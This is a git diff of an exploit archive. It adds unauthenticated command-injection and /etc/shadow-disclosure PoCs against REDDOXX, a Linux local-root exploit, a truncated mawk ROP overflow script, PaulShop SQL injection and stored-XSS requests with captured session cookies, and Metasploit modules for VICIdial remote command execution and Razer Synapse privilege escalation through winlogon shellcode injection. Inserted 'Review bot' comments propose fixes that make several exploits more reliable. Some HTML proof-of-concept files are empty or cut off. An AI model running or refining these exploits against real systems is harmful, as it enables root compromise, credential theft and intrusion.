+$ curl -H 'Content-Type: application/json' --data '{"Name":"Ping",''"Parameter":{"targetHost":"127.0.0.1","count":"1''&& echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'"}}' http://www.example.com/api/v1/rws/diagnose/start
+------------------------------------------------------------------------
+
+Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo
+'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are
+only used to distinguish the output of the "id" command in the final
+result, which can be retrieved and displayed using the following curl
+command-line:
+
+------------------------------------------------------------------------
+
+$ curl --silent -H 'Accept: application/json' http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | sed 's/\\n/\n/g'
+uid=0(root) gid=0(root) groups=0(root)
+------------------------------------------------------------------------
+
+Workaround
+==========
+
+None
+
+Fix
+===
+
+Update the appliance software to Version 2032 SP2.
+
+Security Risk
+=============
+
+The diagnostic functions offered by the REDDOXX appliance allow attackers
+to execute arbitrary commands. Since the commands are executed with root
+privileges and no authentication is required, this is rated as a high
+risk. 
+
+Timeline
+========
+
+2017-05-17 Vulnerability identified
+2017-05-23 Customer approved disclosure of vulnerability
+2017-05-26 Customer provided details of vulnerability to vendor
+2017-07-20 Vulnerability reported as fixed by vendor
+2017-07-24 Advisory released
+
+References
+==========
+
+[0] https://www.reddoxx.com/en/
+[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
+(Requires login)
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
diff --git a/platforms/json/webapps/42372.txt b/platforms/json/webapps/42372.txt
new file mode 100755
index 000000000..6ae792716
--- /dev/null
+++ b/platforms/json/webapps/42372.txt
@@ -0,0 +1,261 @@ +Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance + +RedTeam Pentesting discovered an arbitrary file disclosure vulnerability +in the REDDOXX appliance software, which allows unauthenticated +attackers to list directory contents and download arbitrary files from +the affected system with root permissions. + +Details +======= + +Product: REDDOXX Appliance +Affected Versions: Build 2032 / v2.0.625, older versions likely affected too +Fixed Versions: Version 2032 SP2 +Vulnerability Type: Arbitrary File Disclosure +Security Risk: high +Vendor URL: https://www.reddoxx.com/ +Vendor Status: patch available +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006 +Advisory Status: published +CVE: GENERIC-MAP-NOMATCH +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH + +Introduction +============ + +"REDDOXX is a leading supplier of solutions for e-mail archiving, +encrypted and digitally signed e-mail traffic as well as spam +protection. Our focus is on technological innovation: taking our cue +from our clientsâ?? requirements our competent and quality-conscious +employees strive to offer you the best possible products at all times. +Using stringent quality standards and proven processes we keep +developing our company and products continuously, with the goal of +continuous improvement." + +(from the vendor's homepage) + +More Details +============ + +When using the user frontend of the REDDOXX appliance [0] reachable via +http://www.example.com/rws/user/, HTTP POST requests are used to perform +certain actions. For example, the following request is used to save the +settings of the current user's profile: + +------------------------------------------------------------------------ + +POST /RdxEngine/json HTTP/1.1 +Host: www.example.com +[...] 
+Content-Type: application/x-www-form-urlencoded +Content-Length: 210 +Connection: close + +{ +"method": "CoreService.SaveUserProfile", +"params": { +"Profile": { +"UseHtmlMail": true, +"DefaultArchiveDisplayPeriode": "5", +"ReportLanguage": "en", +"EnableQueueReport": true +} +}, +"id": "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}" +} +------------------------------------------------------------------------ + +Through analysis of the .NET binaries pertaining to this endpoint, +extracted from the appliance ISO offered on the vendor's homepage [1], +the methods handling these requests were examined. For the +"SaveUserProfile" method, which is specified through the POST parameter +"method", the code is as follows: + +------------------------------------------------------------------------ + +// Reddoxx.Api.Legacy.CoreServiceService +public void SaveUserProfile(TRoUserProfile Profile) +{ +try +{ +this.client.OnStartRequest("CoreService", "SaveUserProfile"); +this.Service.SaveUserProfile(Profile); +this.client.OnEndRequest("CoreService", "SaveUserProfile"); +} +catch (System.Exception e) +{ +this.client.HandleException("CoreService", "SaveUserProfile", e); +} +} +------------------------------------------------------------------------ + +The "TroUserProfile" class contains information about the parameters +that are required for valid requests to this method: + +------------------------------------------------------------------------ + +namespace Reddoxx.Api.Legacy +{ +[...] +public class TRoUserProfile : ComplexType +{ +private string __ReportLanguage; + +private int __DefaultArchiveDisplayPeriode; + +private bool __EnableQueueReport; + +private bool __UseHtmlMail; + +[...] +} +} +------------------------------------------------------------------------ + +These variable names correspond to the POST parameters contained in the +request that was created when the profile was saved. 
With this knowledge +about how methods are called and parameters are passed, it was attempted +to call other methods from different packages. It was determined that it +is possible to access certain methods which allow reading arbitrary +files and directory listings. + +It was later discovered that the process handling requests to the +vulnerable methods runs with root privileges. + +Proof of Concept +================ + +At least two methods are found to be of interest for attackers: +FileTransfer.GetDirectoryList, which returns a directory listing for a +path specified via a parameter, and FileTransfer.DownloadFile, which +returns the file specified via a parameter in Base64-encoded form. The +following curl command-lines can be used to call the respective methods: + +------------------------------------------------------------------------ + +$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer +.GetDirectoryList","params":{"Directory": "/etc/"}}' 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName' +"chatscripts" +"gtk-2.0" +"xen" +"dbus-1" +"request-key.d" +"smartmontools" +"console" +"skel" +"xml" +"initramfs-tools" +"sysctl.d" +"pear" +"sudoers.d" +"cron.monthly" +"rc5.d" +"init" +"byobu" +"pki" +"xpdf" +"cron.weekly" +"snmp" +"ld.so.conf.d" +[...] 
+------------------------------------------------------------------------ + +Since the process handling the requests runs with root privileges, it +was also possible to read the contents of the file "/etc/passwd": + +------------------------------------------------------------------------ + +$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer +.DownloadFile","params":{"FileName": "/etc/shadow",''"Sequence": 1,"ChunkSize": 10000}}' 'http://www.example.com/RdxEngine/json' | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d +root:$6$XXXXXXXX$YYYYYYY[...]YYYYYYYY:14993:0:99999:7::: +daemon:*:16652:0:99999:7::: +bin:*:16652:0:99999:7::: +sys:*:16652:0:99999:7::: +sync:*:16652:0:99999:7::: +games:*:16652:0:99999:7::: +man:*:16652:0:99999:7::: +lp:*:16652:0:99999:7::: +mail:*:16652:0:99999:7::: +news:*:16652:0:99999:7::: +uucp:*:16652:0:99999:7::: +proxy:*:16652:0:99999:7::: +www-data:*:16652:0:99999:7::: +backup:*:16652:0:99999:7::: +list:*:16652:0:99999:7::: +irc:*:16652:0:99999:7::: +gnats:*:16652:0:99999:7::: +nobody:*:16652:0:99999:7::: +libuuid:!:16652:0:99999:7::: +syslog:*:16652:0:99999:7::: +messagebus:*:16899:0:99999:7::: +sshd:*:16899:0:99999:7::: +vboxadd:!:16899:::::: +statd:*:16899:0:99999:7::: +admin:$1$XXXXXXXX$ZZZZZZZZZZZZZZZZZZZZZZ:14054:0:99999:7::: +clamav:!:16899:0:99999:7::: +ntp:*:16899:0:99999:7::: +hacluster:!:16899:0:99999:7::: +firebird:*:16899:0:99999:7::: +redis:!:16899:0:99999:7::: +snmp:*:16899:0:99999:7::: +bind:*:16899:0:99999:7::: +smbadmin:!:17037:0:99999:7::: +smbuser:!:17037:0:99999:7::: +------------------------------------------------------------------------ + +Workaround +========== + +None + +Fix +=== + +Update the appliance software to Version 2032 SP2. + +Security Risk +============= + +Attackers with access to a REDDOXX appliance are able to retrieve +directory listings and content of arbitrary files. 
Although this +vulnerability requires attackers to submit a valid session ID, the +vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3] +show how this requirement can be fulfilled even by attackers without +valid credentials. Additionally, the RdxEngine process handling the +requests to the vulnerable methods runs with root privileges, allowing +attackers to read any file on the filesystem and, for example, extract +the local user hashes for offline brute-force attacks. This +vulnerability is therefore rated as a high risk. + +Timeline +======== + +2017-05-17 Vulnerability identified +2017-05-23 Customer approved disclosure of vulnerability +2017-05-26 Customer provided details of vulnerability to vendor +2017-07-20 Vulnerability reported as fixed by vendor +2017-07-24 Advisory released + +References +========== + +[0] https://www.reddoxx.com/en/ +[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads +(Requires login) +[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004 +[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005 + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ \ No newline at end of file diff --git a/platforms/linux/local/38390.c b/platforms/linux/local/38390.c index 9390bd7be..18331a196 100755 --- a/platforms/linux/local/38390.c +++ b/platforms/linux/local/38390.c 
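Review bot: The second proof of concept is introduced as reading "/etc/passwd", but the request that follows sends `"FileName": "/etc/shadow"` and the output shown consists of shadow-format hash entries, so the sentence before the command should read `it was also possible to read the contents of the file "/etc/shadow":`. The summary calls the attackers unauthenticated while the Security Risk section says a valid session ID is required and points to rt-sa-2017-004/005 for obtaining one; the PoC requests only carry a `{XXXXXXXX-...}` placeholder in the `id` field, presumably where that session ID goes, and saying so explicitly next to the curl lines would reconcile the two statements. A one-line remark that the `id` value must be replaced with a live session ID would also stop readers from treating the placeholder as a literal request counter.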
@@ -20,8 +20,7 @@ Local attackers can exploit this issue to gain kernel privileges, which will aid * * stealth@linux-czfh:~> cc -Wall clown-newuser.c -static * stealth@linux-czfh:~> ./a.out - * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian -Krahmer + * [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer * * [+] Found myself: '/home/stealth/a.out' * [*] Parent waiting for boomsh to appear ... @@ -110,12 +109,10 @@ int main(int argc, char *argv[]) if (geteuid() == 0 && argc == 1) { - /* this will run inside chroot, started as the ld.so -from + /* this will run inside chroot, started as the ld.so from * su process */ - printf("[+] Yay! euid=%d uid=%d\n", geteuid(), -getuid()); + printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid()); chown("lib64/ld-linux-x86-64.so.2", 0, 0); chmod("lib64/ld-linux-x86-64.so.2", 04755); exit(0); @@ -126,8 +123,7 @@ getuid()); die("[-] execve"); } - printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 -Sebastian Krahmer\n\n"); + printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n"); memset(me, 0, sizeof(me)); readlink("/proc/self/exe", me, sizeof(me) - 1); @@ -176,5 +172,3 @@ Sebastian Krahmer\n\n"); die("[-] execve"); return -1; } - - diff --git a/platforms/linux/local/42357.py b/platforms/linux/local/42357.py new file mode 100755 index 000000000..532635880 --- /dev/null +++ b/platforms/linux/local/42357.py 
@@ -0,0 +1,98 @@ +#!/usr/bin/python +# Developed using Exploit Pack - http://exploitpack.com - +# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com +# Tested on: GNU/Linux - Kali 2017.1 Release +# +# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. +# +# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful +# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms. +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +import os, subprocess +from struct import pack + + ropchain = "A"*1038 # junk + ropchain += pack(' + + + + +
  • + + + + diff --git a/platforms/multiple/dos/42361.html b/platforms/multiple/dos/42361.html new file mode 100755 index 000000000..7e156aee2 --- /dev/null +++ b/platforms/multiple/dos/42361.html @@ -0,0 +1,197 @@ + + + + +
    +
    +aaa + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42362.html b/platforms/multiple/dos/42362.html new file mode 100755 index 000000000..656718a63 --- /dev/null +++ b/platforms/multiple/dos/42362.html @@ -0,0 +1,207 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42363.html b/platforms/multiple/dos/42363.html new file mode 100755 index 000000000..da830aa85 --- /dev/null +++ b/platforms/multiple/dos/42363.html @@ -0,0 +1,156 @@ + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42364.html b/platforms/multiple/dos/42364.html new file mode 100755 index 000000000..d3bf9e487 --- /dev/null +++ b/platforms/multiple/dos/42364.html @@ -0,0 +1,198 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42365.html b/platforms/multiple/dos/42365.html new file mode 100755 index 000000000..f02642faf --- /dev/null +++ b/platforms/multiple/dos/42365.html @@ -0,0 +1,187 @@ + + + + + + + + +
    + +
    + + + \ No newline at end of file diff --git a/platforms/multiple/dos/42366.html b/platforms/multiple/dos/42366.html new file mode 100755 index 000000000..83fb6284f --- /dev/null +++ b/platforms/multiple/dos/42366.html @@ -0,0 +1,175 @@ + + + + + +
    +
    +
    foo
    + + \ No newline at end of file diff --git a/platforms/multiple/dos/42367.html b/platforms/multiple/dos/42367.html new file mode 100755 index 000000000..1bd5bb852 --- /dev/null +++ b/platforms/multiple/dos/42367.html @@ -0,0 +1,187 @@ + + + + +
    +
    +
    + + + \ No newline at end of file diff --git a/platforms/php/webapps/42359.txt b/platforms/php/webapps/42359.txt new file mode 100755 index 000000000..b0b573434 --- /dev/null +++ b/platforms/php/webapps/42359.txt 
@@ -0,0 +1,64 @@ +# Exploit Title: PaulShop CMS - Sql Injection and stored XSS +# Date: 07/23/2017 +# Exploit Author: BTIS Team (http://www.btis.vn) +# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714] +# Version: 03/27/2017 +# Tested on: Apache/2.4.7 (Ubuntu) +# Contact: research@btis.vn +# Can not contact vendor + + + +1. Description + +- SQL Injection on Search page with "q" parameter (GET) + +- Stored XSS on member's profile page with parameters: firstname, lastname, address, city, state, zipcode, phone, fax, delivery[address], delivery[city], delivery[state], delivery[zipcode] + +2. Examples + + + +- SQL injection: + + + +# http://localhost/shop/en/category/tables?q=[SQL INJECTION HERE] + +# Payload: - True condition: europe' and 1=1)-- - + + - False condition: europe' and 1=0)-- - + + + +- Stored XSS: + + + +# Payload: %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E + +# curl -X POST \ + + 'http://localhost/shop/en/account?save=1' \ + + -H 'cookie: cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \ + + -b 'cookie: mysession_id=QyB45exW7W2fwIi; ci_session=ab1c04c51042f9928a87bb917b1a4759e9f81d11' \ + + -d 
'email=btis%40mailinator.com&password=123456xyz&firstname=BTIS%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&lastname=VN%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&address=address%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&city=city%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&state=HCM%22%3E%3Cscript%3Ealert%287%29%3C%2Fscript%3E&zipcode=700000%22%3E%3Cscript%3Ealert%2812%29%3C%2Fscript%3E&country=VN&phone=%22%3E%3Cscript%3Ealert%2810%29%3C%2Fscript%3E&fax=fax%22%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&delivery%5Baddress%5D=adr2%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&delivery%5Bcity%5D=city2%22%3E%3Cscript%3Ealert%288%29%3C%2Fscript%3E&delivery%5Bstate%5D=MNB%22%3E%3Cscript%3Ealert%289%29%3C%2Fscript%3E&delivery%5Bzipcode%5D=800000%22%3E%3Cscript%3Ealert%2811%29%3C%2Fscript%3E&delivery%5Bcountry%5D=AD&save=Save' + + + +Quan Minh Tâm / Trưởng phòng kỹ thuật + tamqm@btis.vn / 01284 211 290 + +CÔNG TY CÔNG NGHỆ BẢO TÍN +028 3810 6288 – 028 38106289 +5A Trần Văn Dư, phường 13, quận Tân Bình, Tp.Hồ Chí Minh + www.btis.vn + + + + +Email này đã được quét bằng tính năng bảo vệ diệt vi-rút của BullGuard. +Để biết thêm thông tin, hãy truy cập www.bullguard.com diff --git a/platforms/unix/remote/42370.rb b/platforms/unix/remote/42370.rb new file mode 100755 index 000000000..f2fbcb10d --- /dev/null +++ b/platforms/unix/remote/42370.rb 
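Review bot: The curl reproduction sends a malformed header, `-H 'cookie: cookie: mysession_id=...'`, whose value starts with the literal text `cookie:`, and the `-b` option on the following line already supplies the same cookies, so the `-H` line should be removed. The `mysession_id` and `ci_session` values are session identifiers captured from the test instance; replacing them with placeholders such as `-b 'ci_session=<authenticated session>'` makes it clear that a reader needs an account and a fresh login rather than these tokens. The boolean-based SQL injection payloads (`europe' and 1=1)-- -` versus `1=0`) would be easier to verify with one sentence stating what observable difference in the search results distinguishes the true and false cases. The mail signature and the antivirus scan footer at the end are not part of the advisory and should be dropped from the file.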
@@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in VICIdial versions + 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users + to execute arbitrary operating system commands as the web + server user if password encryption is enabled (disabled + by default). + + When password encryption is enabled the user's password + supplied using HTTP basic authentication is used in a call + to exec(). + + This module has been tested successfully on version 2.11 RC2 + and 2.13 RC1 on CentOS. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + # HTTP Basic authentication password + 'Space' => 2048, + # apostrophe ('), quote ("), semi-colon (;) and backslash (\) + # are removed by preg_replace + 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat' + } + }, + 'Targets' => [[ 'Automatic Targeting', {} ]], + 'Privileged' => false, + 'DisclosureDate' => 'May 26 2017', + 'DefaultTarget' => 0)) + register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) + deregister_options('USERNAME', 'PASSWORD') + end + + def check + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}&#" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + unless 
res + vprint_status 'Connection failed' + return CheckCode::Unknown + end + + if res.code != 401 + vprint_status "#{peer} Unexpected reply. Expected authentication failure." + return CheckCode::Safe + end + + # Check for input filtering of '#' and '&' characters in password + # Response for invalid credentials is in the form of: |||BAD| + if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ + vprint_status "#{peer} Target is patched." + return CheckCode::Safe + end + + # Check for ../agc/bp.pl password encryption script + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') + if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ + vprint_status "#{peer} Password encryption is supported, but may not be enabled." + return CheckCode::Appears + end + + vprint_status "#{peer} Could not verify whether password encryption is supported." + CheckCode::Detected + end + + def execute_command(cmd, opts = {}) + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" + + print_status "#{peer} Sending payload (#{cmd.length} bytes)" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + if !res + fail_with(Failure::Unreachable, 'Connection failed') + elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ + print_good "#{peer} Payload sent successfully" + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply') + end + end + + def exploit + execute_command(payload.encoded) + end +end \ No newline at end of file diff --git a/platforms/win_x86-64/local/42368.rb b/platforms/win_x86-64/local/42368.rb new file mode 100755 index 000000000..f8a7ad41a --- /dev/null +++ b/platforms/win_x86-64/local/42368.rb 
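Review bot: In `check`, any response other than a 401 — for example a 404 from a wrong TARGETURI or a 403 from a proxy in front of the host — is reported as `CheckCode::Safe`, which asserts the target is not vulnerable when the module has merely failed to reach the authentication prompt; that branch should `return CheckCode::Unknown` and keep `Safe` for the case where the echoed credentials are filtered. The body match just below interpolates `user` and `pass` into a regex unescaped; both are alphabetic plus `&#` so it works today, but `Regexp.escape(pass)` would keep it correct if the probe string is ever changed to include metacharacters. The `..` segment in `normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')` presumably relies on the server resolving the parent directory; a short comment stating the intended URL (`/agc/bp.pl` relative to the VICIdial root) would help anyone debugging a false `Detected` result.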
@@ -0,0 +1,260 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/windows_kernel' +require 'rex' +require 'metasm' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Local::WindowsKernel + include Msf::Post::Windows::Priv + + # the max size our hook can be, used before it's generated for the allocation + HOOK_STUB_MAX_LENGTH = 256 + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess', + 'Description' => %q{ + A vulnerability exists in the latest version of Razer Synapse + (v2.20.15.1104 as of the day of disclosure) which can be leveraged + locally by a malicious application to elevate its privileges to those of + NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler + in the rzpnk.sys driver that passes a PID specified by the user to + ZwOpenProcess. This can be issued by an application to open a handle to + an arbitrary process with the necessary privileges to allocate, read and + write memory in the specified process. + + This exploit leverages this vulnerability to open a handle to the + winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by + installing a hook to execute attacker controlled shellcode. This hook is + then triggered on demand by calling user32!LockWorkStation(), resulting + in the attacker's payload being executed with the privileges of the + infected winlogon process. In order for the issued IOCTL to work, the + RazerIngameEngine.exe process must not be running. This exploit will + check if it is, and attempt to kill it as necessary. + + The vulnerable software can be found here: + https://www.razerzone.com/synapse/. No Razer hardware needs to be + connected in order to leverage this vulnerability. 
+ + This exploit is not opsec-safe due to the user being logged out as part + of the exploitation process. + }, + 'Author' => 'Spencer McIntyre', + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2017-9769'], + ['URL', 'https://warroom.securestate.com/cve-2017-9769/'] + ], + 'Platform' => 'win', + 'Targets' => + [ + # Tested on (64 bits): + # * Windows 7 SP1 + # * Windows 10.0.10586 + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'WfsDelay' => 20 + }, + 'DefaultTarget' => 0, + 'Privileged' => true, + 'DisclosureDate' => 'Mar 22 2017')) + end + + def check + # Validate that the driver has been loaded and that + # the version is the same as the one expected + client.sys.config.getdrivers.each do |d| + if d[:basename].downcase == 'rzpnk.sys' + expected_checksum = 'b4598c05d5440250633e25933fff42b0' + target_checksum = client.fs.file.md5(d[:filename]) + + if expected_checksum == Rex::Text.to_hex(target_checksum, '') + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + end + end + + Exploit::CheckCode::Safe + end + + def exploit + if is_system? 
+ fail_with(Failure::None, 'Session is already elevated') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + elsif session.arch != ARCH_X64 + fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets') + end + + pid = session.sys.process['RazerIngameEngine.exe'] + if pid + # if this process is running, the IOCTL won't work but the process runs + # with user privileges so we can kill it + print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") + session.sys.process.kill(pid) + end + + pid = session.sys.process['winlogon.exe'] + print_status("Found winlogon pid: #{pid}") + + handle = get_handle(pid) + fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil? + vprint_status('Successfully opened a handle to the winlogon process') + + winlogon = session.sys.process.new(pid, handle) + allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH + shellcode_address = winlogon.memory.allocate(allocation_size) + winlogon.memory.protect(shellcode_address) + print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}") + winlogon.memory.write(shellcode_address, payload.encoded) + hook_stub_address = shellcode_address + payload.encoded.length + + result = session.railgun.kernel32.LoadLibraryA('user32') + fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0 + user32_handle = result['return'] + + # resolve and backup the functions that we'll install trampolines in + user32_trampolines = {} # address => original chunk + user32_functions = ['LockWindowStation'] + user32_functions.each do |function| + address = get_address(user32_handle, function) + winlogon.memory.protect(address) + user32_trampolines[function] = { + address: address, + 
original: winlogon.memory.read(address, 24) + } + end + + # generate and install the hook asm + hook_stub = get_hook(shellcode_address, user32_trampolines) + fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil? + # if this happens, there was a programming error + fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH + + winlogon.memory.write(hook_stub_address, hook_stub) + vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}") + + # install the asm trampolines to jump to the hook + user32_trampolines.each do |function, trampoline_info| + address = trampoline_info[:address] + trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{ + mov rax, 0x#{address.to_s(16)} + push rax + mov rax, 0x#{hook_stub_address.to_s(16)} + jmp rax + }).encode_string + winlogon.memory.write(address, trampoline) + vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}") + end + + session.railgun.user32.LockWorkStation() + session.railgun.kernel32.CloseHandle(handle) + end + + def get_address(dll_handle, function_name) + result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name) + fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0 + result['return'] + end + + # this is where the actual vulnerability is leveraged + def get_handle(pid) + handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') + return nil unless handle + vprint_status('Successfully opened a handle to the driver') + + buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 
'QQ' : 'LL') + + session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[ + ['DWORD', 'FileHandle', 'in' ], + ['DWORD', 'Event', 'in' ], + ['LPVOID', 'ApcRoutine', 'in' ], + ['LPVOID', 'ApcContext', 'in' ], + ['PDWORD', 'IoStatusBlock', 'out'], + ['DWORD', 'IoControlCode', 'in' ], + ['PBLOB', 'InputBuffer', 'in' ], + ['DWORD', 'InputBufferLength', 'in' ], + ['PBLOB', 'OutputBuffer', 'out'], + ['DWORD', 'OutputBufferLength', 'in' ], + ]) + result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length) + return nil if result['return'] != 0 + session.railgun.kernel32.CloseHandle(handle) + + result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1] + end + + def get_hook(shellcode_address, restore) + dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return'] + return nil if dll_handle == 0 + create_thread_address = get_address(dll_handle, 'CreateThread') + + stub = %{ + call main + ; restore the functions where the trampolines were installed + push rbx + } + + restore.each do |function, trampoline_info| + original = trampoline_info[:original].unpack('Q*') + stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}" + original.each do |chunk| + stub << %{ + mov rbx, 0x#{chunk.to_s(16)} + mov qword ptr ds:[rax], rbx + add rax, 8 + } + end + end + + stub << %{ + pop rbx + ret + + main: + ; backup registers we're going to mangle + push r9 + push r8 + push rdx + push rcx + + ; setup the arguments for the call to CreateThread + xor rax, rax + push rax ; lpThreadId + push rax ; dwCreationFlags + xor r9, r9 ; lpParameter + mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress + xor rdx, rdx ; dwStackSize + xor rcx, rcx ; lpThreadAttributes + mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread + + call rax + add rsp, 16 + + ; restore arguments that were mangled + pop rcx + pop rdx + pop r8 + pop r9 + ret + } + 
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string + end +end \ No newline at end of file diff --git a/platforms/windows/remote/42354.html b/platforms/windows/remote/42354.html new file mode 100755 index 000000000..fc348073e --- /dev/null +++ b/platforms/windows/remote/42354.html 
